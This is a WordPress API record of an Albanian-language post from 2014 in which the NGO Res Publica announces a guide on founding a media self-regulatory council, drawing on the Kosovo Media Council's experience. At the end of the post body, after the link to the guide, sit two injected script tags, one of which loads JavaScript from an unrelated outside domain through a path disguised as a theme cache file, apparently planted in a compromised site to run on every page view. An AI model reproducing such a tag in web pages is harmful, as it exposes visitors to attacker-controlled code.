{"id":665,"date":"2014-01-17T04:38:55","date_gmt":"2014-01-17T02:38:55","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=665"},"modified":"2014-03-10T04:53:28","modified_gmt":"2014-03-10T02:53:28","slug":"res-publica-pergatit-udhezuesin-per-themelimin-e-keshillit-te-mediave","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=665","title":{"rendered":"Res Publica pergatit udhezuesin per themelimin e Keshillit te Mediave"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2014\/03\/kopertina-CRD-per-web.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"size-medium wp-image-666 alignleft\" alt=\"kopertina CRD per web\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2014\/03\/kopertina-CRD-per-web-210x300.jpg\" width=\"210\" height=\"300\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/03\/kopertina-CRD-per-web-210x300.jpg 210w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/03\/kopertina-CRD-per-web.jpg 476w\" sizes=\"(max-width: 210px) 100vw, 210px\" \/><\/a>Iniciativa p\u00ebr themelimin e nj\u00eb organi vet\u00ebrregullues p\u00ebr mediat jan\u00eb nd\u00ebrmarr\u00eb edhe n\u00eb t\u00eb kaluar\u00ebn. Madje k\u00ebto tentativa kan\u00eb shkuar shum\u00eb pran\u00eb konkretizimit, por botuesit jan\u00eb treguar skeptik\u00eb p\u00ebr rolin e k\u00ebtij organi, pasi shtypi i druhej humbjes s\u00eb liris\u00eb s\u00eb fituar me shum\u00eb mund. Me kalimin e koh\u00ebs, me konsolidimin e liris\u00eb s\u00eb shprehjes, pas nj\u00eb serie takimesh me profesionist\u00eb t\u00eb medias, si dhe pas eksperienc\u00ebs s\u00eb krijuar nga rastet e mbrojtjes s\u00eb gazetar\u00ebve n\u00eb gjykat\u00eb, Res Publica identifikoi nevoj\u00ebn p\u00ebr t\u2019iu rikthyer k\u00ebsaj nisme, p\u00ebr t\u00eb p\u00ebrgatitur shtratin e themelimit t\u00eb nj\u00eb organi vet\u00ebrregullues p\u00ebr mediat, me mbeshtetjen e Civil Rights Defenders. Profesionist\u00eb t\u00eb medias dhe shoqatat e tyre e kan\u00eb mir\u00ebpritur iden\u00eb. Ata kan\u00eb konsideruar se funksionimi i nj\u00eb organi t\u00eb till\u00eb do t\u2018u siguroj\u00eb atyre udh\u00ebzime shum\u00eb t\u00eb nevojshme praktike n\u00eb ushtrimin e funksioneve t\u00eb tyre. N\u00eb t\u00eb nj\u00ebjt\u00ebn koh\u00eb, nj\u00eb organ i till\u00eb mund t\u00eb rezultoj\u00eb i r\u00ebnd\u00ebsish\u00ebm n\u00eb sigurimin e nj\u00eb mbrojtje m\u00eb efektive t\u00eb gazetar\u00ebve para gjykatave vendase, pasi kjo do t\u00eb lejoj\u00eb q\u00eb gjyqtar\u00ebt t\u00eb drejtohen dhe t\u00eb mb\u00ebshteten mbi mendimin e koleg\u00ebve jurist\u00eb dhe t\u00eb ekspert\u00ebve t\u00eb deontologjis\u00eb q\u00eb do t\u00eb atashohen pran\u00eb nj\u00eb organi t\u00eb till\u00eb profesional.<\/p>\n<p>Res Publica ka kryer hulumtime krahasuese me q\u00ebllim marrjen e eksperiencave pozitive n\u00eb krijimin e organeve vet\u00ebrregulluese p\u00ebr mediat. P\u00ebr k\u00ebt\u00eb q\u00ebllim, Res Publica ka kontaktuar nga af\u00ebr edhe me an\u00ebtar\u00ebt e K\u00ebshillit t\u00eb Mediave t\u00eb Kosov\u00ebs, nj\u00eb organ gjer\u00ebsisht i respektuar dhe shum\u00eb efektiv, t\u00eb cil\u00ebt kan\u00eb r\u00ebn\u00eb dakord p\u00ebr t\u00eb ndar\u00eb p\u00ebrvoj\u00ebn e tyre dhe t\u00eb ofrojn\u00eb ndihm\u00eb n\u00eb ngritjen e nj\u00eb institucioni ekuivalent n\u00eb Shqip\u00ebri. Duhet t\u00eb theksohet n\u00eb k\u00ebt\u00eb drejtim, q\u00eb n\u00eb shkurt t\u00eb vitit 2013, K\u00ebshilli i Mediave t\u00eb Kosov\u00ebs \u00ebsht\u00eb zgjedhur p\u00ebr t\u00eb ndihmuar n\u00eb ngritjen e nj\u00eb K\u00ebshilli t\u00eb Mediave n\u00eb Maqedoni, d\u00ebshmi e m\u00ebtejshme kjo e reputacionit t\u00eb merituar t\u00eb organit vet\u00ebrregullues kosovar.<\/p>\n<p>Aktualisht mund t\u00eb arrihet n\u00eb konkluzionin se nuk mund t\u00eb pretendohet se ekziston nj\u00eb model perfekt. Prandaj lind domosdoshm\u00ebria q\u00eb kjo \u00e7\u00ebshtje t\u2019i shtrohet debatit lidhur me nj\u00eb gam\u00eb t\u00eb gjer\u00eb t\u00eb shqet\u00ebsimeve n\u00eb praktik\u00eb. Si do t\u00eb funksionoj\u00eb, cilat jan\u00eb sfidat me t\u00eb cilat do t\u00eb p\u00ebrballet kjo nism\u00eb, etj, jan\u00eb disa nga pyetjet q\u00eb presin p\u00ebrgjigje t\u00eb nj\u00eb natyre komplekse duke nxjerr n\u00eb pah aspekte t\u00eb ve\u00e7anta t\u00eb vet\u00ebrregullimit t\u00eb medias, t\u00eb trajtuara m\u00eb gjer\u00ebsisht n\u00eb udh\u00ebzuesin &#8220;Keshilli i Medias &#8211; Nje domosdoshmeri e kohes&#8221;, te cilin mund ta gjeni duke klikuar kete link:\u00a0<a title=\"http:\/\/issuu.com\/respublicalb\/docs\/keshilli_i_mediave_-_udhezues\" href=\"http:\/\/issuu.com\/respublicalb\/docs\/keshilli_i_mediave_-_udhezues\">http:\/\/issuu.com\/respublicalb\/docs\/keshilli_i_mediave_-_udhezues<\/a><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Iniciativa p\u00ebr themelimin e nj\u00eb organi vet\u00ebrregullues p\u00ebr mediat jan\u00eb nd\u00ebrmarr\u00eb edhe n\u00eb t\u00eb kaluar\u00ebn. Madje k\u00ebto tentativa kan\u00eb shkuar [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":666,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,9,1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/665"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=665"}],"version-history":[{"count":4,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/665\/revisions"}],"predecessor-version":[{"id":670,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/665\/revisions\/670"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/666"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=665"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=665"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=665"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}